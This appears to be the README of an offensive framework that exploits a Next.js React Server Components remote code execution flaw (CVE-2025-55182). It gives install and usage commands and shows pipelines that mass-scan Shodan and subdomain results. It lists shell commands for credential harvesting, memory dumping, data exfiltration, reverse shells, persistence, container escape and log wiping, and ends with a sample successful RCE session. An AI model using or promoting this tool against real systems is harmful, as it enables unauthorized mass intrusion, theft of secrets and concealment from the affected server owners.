R2S is a comprehensive exploitation and post-exploitation framework targeting the Next.js React Server Components vulnerability (CVE-2025-55182). It provides an interactive shell with advanced features for penetration testing, including file transfer, persistence, enumeration, privilege escalation checks, and more.
Advanced Post-Exploitation Framework for Next.js React Server Components RCE
Features • Installation • Usage • Commands • Examples
R2S is a comprehensive exploitation and post-exploitation framework targeting the Next.js React Server Components vulnerability (CVE-2025-55182). It provides an interactive shell with advanced features for penetration testing, including file transfer, persistence, enumeration, privilege escalation checks, and more.
.env files and configuration files# Python 3.6 or higher
python3 --version
# Install dependencies
pip3 install requests urllib3
# Clone or download the tool
cd r2s-main
# Make executable (optional)
chmod +x r2s_enhanced.py
# Run the tool
python3 r2s_enhanced.py -h
python3 r2s_enhanced.py [OPTIONS]
| Option | Description | Default |
|---|---|---|
-u, --url | Single target URL | - |
-l, --list | File containing list of URLs | - |
-c, --cmd | Initial command to execute | id |
-t, --threads | Number of scanning threads | 30 |
-p, --proxy | HTTP proxy (e.g., http://127.0.0.1:8080) | - |
-v, --verbose | Enable verbose output | False |
--http-port | HTTP server port for file transfer | 8000 |
python3 r2s_enhanced.py -u http://target.com
python3 r2s_enhanced.py -l targets.txt -t 50
cat targets.txt | python3 r2s_enhanced.py
shodan search "Next.js" | python3 r2s_enhanced.py
subfinder -d example.com | httpx | python3 r2s_enhanced.py
Once you gain RCE access, you'll enter an interactive shell with these commands:
upload <local_file> <remote_path> # Upload file to target
download <remote_file> <local_path> # Download file from target
cd <directory> # Change working directory
pwd # Print working directory
enum # Complete system enumeration
privesc # Privilege escalation checks
harvest # Credential harvesting
portscan <ip> # Scan internal network ports
memdump [pid] # Dump process memory for secrets
lateral # Lateral movement opportunities
escape # Container escape vectors
exfil [type] # Exfiltrate data (env/config/keys/db/logs/all)
reverse <lhost> <lport> # Try multiple reverse shell payloads
persist # Add basic persistence
advpersist # Add advanced persistence
stealth # Clear logs and hide tracks
save # Save current session
help, ? # Show help message
exit, quit # Exit interactive shell
Execute any shell command directly:
whoami
id
uname -a
ps aux
netstat -tulpn
cat /etc/passwd
$ python3 r2s_enhanced.py -u http://vulnerable-app.com
_ __ __ ____
/ | / /__ _ __/ /_/ __ \________
/ |/ / _ \| |/_/ __/ /_/ / ___/ _ \
/ /| / __/> </_ _/ _, _/ /__/ __/
/_/ |_/\___/_/|_|\__/_/ |_|\___/\___/
Next.js RSC Exploit Tool (CVE-2025-55182)
Mass Scanner & Pipeline Edition (v4.1.0 - Enhanced)
>> CREDIT( G4rxd )
[*] Loaded 1 targets. Starting scan with 30 threads...
[*] Payload Command: id
[VULN] http://vulnerable-app.com >>> RCE SUCCESS
Output: uid=1000(node) gid=1000(node) groups=1000(node)
[+] Stateful Interactive RCE shell started. Type 'help' for commands.
[*] Advanced features: enum, privesc, persist, portscan, harvest, stealth
[*] New features: memdump, lateral, escape, exfil, advpersist, reverse